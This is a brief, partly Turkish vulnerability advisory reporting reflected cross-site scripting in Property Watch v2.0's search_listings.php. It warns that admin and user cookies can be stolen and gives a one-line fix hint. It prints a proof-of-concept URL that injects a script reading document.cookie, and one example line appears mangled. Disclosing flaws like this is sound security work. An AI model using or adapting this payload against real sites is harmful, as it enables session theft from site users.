< ------------------- header data start ------------------- >
#############################################################
# Application Name : Property Watch v2.0
# Vulnerable Type : Cross Site Scripting ( XSS )
# Infection : Yönetici ve User cookieleri çalinabilir.
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
# author : Bug Researchers/HayBer
# Example : alert(document.cookie)http://demo.propertywatchscript.com/search_listings.php?advsearchsubmit=advsearchsubmit&cmc=\\><script>alert(document.cookie)</script>
Or ; alert(document.cookie)>Click
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
search_listings.php?advsearchsubmit=advsearchsubmit&cmc=\\><script>alert(document.cookie)</script>
< -- bug code end of -- >